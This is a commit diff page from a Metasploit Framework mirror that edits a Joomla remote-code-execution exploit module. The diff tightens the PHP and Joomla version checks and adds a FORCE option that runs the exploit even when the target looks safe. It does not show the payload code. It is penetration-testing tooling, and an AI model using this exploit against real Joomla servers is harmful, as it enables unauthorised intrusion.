infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

implement @wchen-r7 's suggestions

bug/bundler_fix
Christian Mehlmauer 2015-12-16 20:31:43 +01:00
parent b43d580276
commit 76438dfb2f
No known key found for this signature in database
GPG Key ID: DCF54A05D6E62591
1 changed files with 14 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
modules/exploits/multi/http/joomla_http_header_rce.rb
View File

@ -6,7 +6,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
@ -51,6 +51,11 @@ class Metasploit3 < Msf::Exploit::Remote
OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),
OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
], self.class)
register_advanced_options(
[
OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
], self.class)
end
def check
@ -80,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog
if rest && rest.include?('ubuntu')
sub_version = rest.scan(/^\dubuntu([\d\.]+)/i).flatten.first || ''
vprint_status("Found Ubuntu PHP version: #{res.headers['X-Powered-By']}")
vprint_status("Found Ubuntu PHP version #{res.headers['X-Powered-By']}")
if version > Gem::Version.new('5.5.9')
vulnerable = false
@ -93,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
elsif rest && rest.include?('+deb')
sub_version = rest.scan(/^\d+\+deb([\du]+)/i).flatten.first || ''
vprint_status("Found Debian PHP version: #{res.headers['X-Powered-By']}")
vprint_status("Found Debian PHP version #{res.headers['X-Powered-By']}")
if version > Gem::Version.new('5.4.45')
vulnerable = false
@ -103,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
vulnerable = true
end
else
vprint_status("Found PHP version: #{res.headers['X-Powered-By']}")
vprint_status("Found PHP version #{res.headers['X-Powered-By']}")
vulnerable = true if version <= Gem::Version.new('5.4.44')
vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))
vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))
@ -117,8 +122,9 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })
if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')
joomla_version = res.body.scan(/<version>([\d\.]+)<\/version>/i).flatten.first || ''
if joomla_version
return Exploit::CheckCode::Vulnerable if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
unless joomla_version.empty?
vprint_status("Detected Joomla version #{joomla_version}")
return Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')
end
end
@ -131,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
Exploit::CheckCode::Unknown
Exploit::CheckCode::Safe
end
def get_payload
@ -152,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
if check == Exploit::CheckCode::Safe
if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false
print_error('Target seems safe, so we will not continue.')
return
end